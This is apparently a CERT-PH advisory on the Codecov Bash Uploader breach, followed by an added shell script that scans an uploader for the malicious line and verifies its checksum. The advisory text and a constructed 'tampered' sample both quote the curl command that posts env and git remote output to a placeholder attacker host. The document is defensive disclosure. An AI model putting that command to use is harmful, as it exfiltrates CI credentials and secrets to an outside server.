Codecov has disclosed and acknowledged that it suffered a data breach that can potentially be chained to launch attacks on its customers. Codecov is a company that sells and provides solutions that integrate tools for developers to gain actionable visibility into their source code, also known as Code Coverage. This helps developers measure how much of the source code executes during testing and identify any undetected bugs. According to the company, the initial attack occurred in January of this year, wherein threat actors gained access to its Docker image creation process and extracted the credentials needed to access and modify the company’s Bash Uploader and other internal systems, including the Codecov CircleCI Orb, the Codecov-actions uploader for GitHub and the Codecov Bitrise Step.

______________________________

A. Nature of Attack

Description of the attack:

Threat actors targeted and modified a version of the Bash Uploader, a tool primarily used to send code coverage reports to Codecov’s platform, so that it exported information from customers’ continuous integration (CI) environments to an attacker-controlled server outside of Codecov’s infrastructure. The threat actor could then potentially affect and gain access to the following:

  • Any credentials, tokens, or keys that customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed
  • Any services, datastores, and application code that could be accessed with the given credentials, tokens, or keys
  • The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI

______________________________

B. Actions to be Taken

CERT-PH recommends the following actions be taken:

  • Affected users immediately re-roll all of their credentials, tokens, or keys located in the environment variables in their CI processes that relied on Bash Uploader.
  • Users are highly advised to check the bash script for any line that contains the following, and to immediately replace the bash files with the most recent version from https://codecov.io/bash: curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://<attacker_ip>/upload/v2 || true
  • Additionally, any locally stored version of the Bash Uploader must be checked for the said line and immediately replaced with the latest version.
  • On-premise versions of Codecov are unlikely to be impacted, since they fetch the Bash Uploader from your self-hosted Codecov installation. However, you can verify where you are fetching the Bash Uploader from by looking at your CI pipeline configuration.
  • Users that conduct a checksum comparison before using the Bash Uploaders as part of their CI processes are not impacted by this issue.
  • For additional information regarding the issue, kindly refer to the official Security Update of Codecov (https://about.codecov.io/security-update/)
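As an added example (not CERT-PH's or Codecov's own code), the following POSIX shell script performs the two checks recommended above: it scans a locally stored Bash Uploader for the fixed parts of the exfiltration line quoted in this advisory, and it compares the file's SHA-256 with a known-good digest. The file names, the placeholder attacker host and the two sample uploader stubs are constructed for the demonstration; the digest is computed from the constructed clean stub only so that the script runs offline, and in real use it must come from a trusted published checksum, never from the file being checked.

```shell
#!/bin/sh
# Added example, not CERT-PH's or Codecov's own code.
# Scans a locally stored Bash Uploader for the exfiltration line quoted in
# this advisory and verifies the file's SHA-256 against a known-good digest.

# Fixed parts of the malicious line. The attacker host is deliberately not
# matched, so the check works whatever IP a tampered copy points at.
# "|| true" is left out because "|" is an alternation operator in extended
# regular expressions.
INDICATOR='curl -sm 0\.5 -d .*\$\(git remote -v\).*\$\(env\).*/upload/v2'

# Portable SHA-256: GNU coreutils sha256sum, or shasum on BSD/macOS.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Returns 0 if the uploader is clean, 1 if the exfiltration line is present.
scan_uploader() {
    if grep -Eq "$INDICATOR" "$1"; then
        echo "TAMPERED: $1 contains the exfiltration line" >&2
        return 1
    fi
    return 0
}

# Returns 0 if the file's SHA-256 equals the expected digest, 1 otherwise.
# The expected digest must come from a trusted source (the checksum published
# for the release your pipeline pinned), never from the file itself.
verify_checksum() {
    actual=$(sha256_of "$1")
    [ "$actual" = "$2" ]
}

# Both checks must pass before a CI job is allowed to execute the file.
check_uploader() {
    scan_uploader "$1" && verify_checksum "$1" "$2"
}

# --- Constructed sample files for a self-contained demonstration ----------
WORK=$(mktemp -d)

# Stand-in for a clean uploader (constructed; not the real Codecov script).
cat > "$WORK/codecov_clean.sh" <<'EOF'
#!/bin/bash
set -e
curl -X POST --data-binary @coverage.txt "https://codecov.io/upload/v4?token=$CODECOV_TOKEN"
EOF

# The same stub with the exfiltration line inserted, as the advisory describes.
# ATTACKER_IP_PLACEHOLDER stands in for the host; the real IP is not reproduced.
cat > "$WORK/codecov_tampered.sh" <<'EOF'
#!/bin/bash
set -e
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://ATTACKER_IP_PLACEHOLDER/upload/v2 || true
curl -X POST --data-binary @coverage.txt "https://codecov.io/upload/v4?token=$CODECOV_TOKEN"
EOF

# In real use this is the digest recorded for the known-good release; here it
# is computed from the constructed clean stub so the example runs offline.
KNOWN_GOOD_SHA256=$(sha256_of "$WORK/codecov_clean.sh")

check_uploader "$WORK/codecov_clean.sh" "$KNOWN_GOOD_SHA256" && echo "clean copy: OK"
check_uploader "$WORK/codecov_tampered.sh" "$KNOWN_GOOD_SHA256" || echo "tampered copy: rejected"
```

Running the script prints "clean copy: OK" for the stub and "tampered copy: rejected" for the copy carrying the exfiltration line. Pointing check_uploader at the uploader your pipeline actually downloads or stores, with the published digest as the second argument, turns it into the pre-execution gate that the checksum-comparison bullet above describes.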

______________________________

C. Conclusion

In conclusion, organizations and businesses, both private and public, that use Codecov’s Bash Uploader must update their bash scripts from the official repositories, perform the mitigation steps above and take additional measures to secure their assets. Closely monitor and observe any identified assets until the issue is fully resolved.